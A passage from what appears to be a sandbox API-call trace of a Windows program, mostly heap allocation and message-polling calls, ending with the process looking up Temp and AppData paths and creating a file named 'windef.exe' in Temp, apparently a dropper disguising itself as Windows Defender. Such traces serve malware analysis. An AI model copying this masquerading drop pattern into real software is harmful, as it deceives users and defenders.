dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0129.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0129.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff78 [0129.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300220 | out: hHeap=0x12c0000) returned 1 [0129.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff78 | out: hHeap=0x12c0000) returned 1 [0129.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.139] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.139] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0129.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.140] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.140] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.140] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0129.141] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300018 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0129.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316880 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0129.143] CharLowerBuffW (in: lpsz="byte[357376]", cchLength=0xc | out: lpsz="byte[357376]") returned 0xc [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x13062f8 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe60 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69c8 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6968 [0129.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0129.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6968 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300090 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300018 | out: hHeap=0x12c0000) returned 1 [0129.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0129.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x1305e78 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13062f8 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e380 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305e78 | out: hHeap=0x12c0000) returned 1 [0129.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.212] CharUpperBuffW (in: lpsz="GETDIR", cchLength=0x6 | out: lpsz="GETDIR") returned 0x6 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.213] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7def88 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0129.213] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7ded68 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0129.213] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0129.214] GetLastError () returned 0x3f0 [0129.214] SetLastError (dwErrCode=0x3f0) [0129.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0129.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6698 [0129.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.215] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0129.215] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.216] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0129.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0129.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0129.217] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0129.217] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0129.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0129.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0129.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0129.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0129.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0129.218] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.218] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0129.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0129.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0129.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0129.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0129.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0129.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0129.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0129.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0129.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0129.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0129.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0129.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x14908e0 [0129.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc0) returned 0x1311b00 [0129.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14908e0 | out: hHeap=0x12c0000) returned 1 [0129.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0129.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0129.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x14bffb0 [0129.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0129.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0129.224] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0129.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0129.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0129.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0129.225] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1311b00 | out: hHeap=0x12c0000) returned 1 [0129.225] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 